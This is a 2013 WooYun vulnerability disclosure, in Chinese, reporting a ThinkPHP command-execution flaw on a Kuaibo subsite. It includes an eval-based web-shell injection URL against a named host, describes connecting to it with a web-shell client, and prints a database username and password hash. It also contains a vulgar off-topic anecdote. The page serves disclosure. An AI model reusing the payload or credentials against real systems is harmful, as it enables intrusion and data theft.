当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042740

漏洞标题:快播某分站命令执行导致N多分站沦陷

相关厂商:快播

漏洞作者: sql

提交时间:2013-11-13 10:20

修复时间:2013-12-28 10:21

公开时间:2013-12-28 10:21

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-13: 细节已通知厂商并且等待厂商处理中
2013-11-13: 厂商已经确认,细节仅向厂商公开
2013-11-23: 细节向核心白帽子及相关领域专家公开
2013-12-03: 细节向普通白帽子公开
2013-12-13: 细节向实习白帽子公开
2013-12-28: 细节向公众公开

简要描述:

快播N多分站沦陷

详细说明:

其实就是thinkphp命令执行导致的。
shell地址
http://kuaibo.union.tudou.com/?s=/a/a/a/{${eval($_POST[a])}}
密码是:a
上菜刀

kuaibo1.jpg


好多快播的分站啊。
我把nginx配置文件下载回来看了下:

kuaibo2.jpg


大都是快播的分站,不过好多分站都是 限制IP的。
类似这样的

kuaibo3.jpg


内核版本有点低
Linux ZQ220_156 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010 x86_64
我就懒得提权了。
反正数据库都能看。
主要本吊想快点刷点乌币换苹果呢。也就没深入。
我看到他数据库密码很有意思呢。

kuaibo4.jpg


这种不是掩耳盗铃吗?
我直接复制出来echo就打印出密码了,没有起到加密的作用哦。
我解密后是这个
kbtudou
8e772fbae02eb5df23d20c4840cc2d4c
然后连接一下看看:

kuaibo5.jpg


连上了 我也就不脱裤了,它又不是女神。
里面数据库有很多呢 举个例子:

kuaibo6.jpg


今天我跟女神聊天了。
回来寝室,立马打开我的台式电脑,想着心爱的女神一定要在线啊。不过,大快人心的是果然是灰蒙蒙的头像,我知道女神肯定是对我在线隐身了。不过我这样的吊丝也是有自知者明的,心里想着,能给你送这么高贵的爱疯5的人在学校也不可能超过三个。你就乖乖投降吧。
  然后我就给女神留言了,说我在乌云的rank快可以换爱疯5了,自己不爱怎么喜欢苹果,所以送给她。本吊还是很有自尊心的,想这样说比较有面子,其实何尝不想尝试下爱疯呢。碉堡了的是,女神马上头像就闪动起来了。
  “嗯,谢谢啦,我刚回来开电脑就看到你留言了”
  
  看到女神自己照片做的头像亮了起来,心里想,当我白痴,当时真想狠狠撸她一管,以解心头之恨,简直是欺负吊丝智商,毕竟吊丝一直混乌云的,这些小伎俩前辈们都中招给我们提示了。哼!
  
  正在意淫怎么和女神啪啪啪呢,女神就发来消息说,去洗澡。
  我连忙说。晚安~早点睡,好梦。
  字还没打完,头像又黑了。
  
  哎,想想也就算了,毕竟能和女神说一次这么久的QQ,也不容易了。
还是快点多日点站吧。

漏洞证明:

kuaibo1.jpg


kuaibo2.jpg


kuaibo3.jpg


kuaibo4.jpg


kuaibo5.jpg


kuaibo6.jpg

修复方案:

我没脱你们裤啊,求礼物

版权声明:转载请注明来源 sql@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-11-13 11:50

厂商回复:

非常感谢 @sql 的漏洞提供。。。漏洞已确认。 也在紧急修复中...

最新状态:

暂无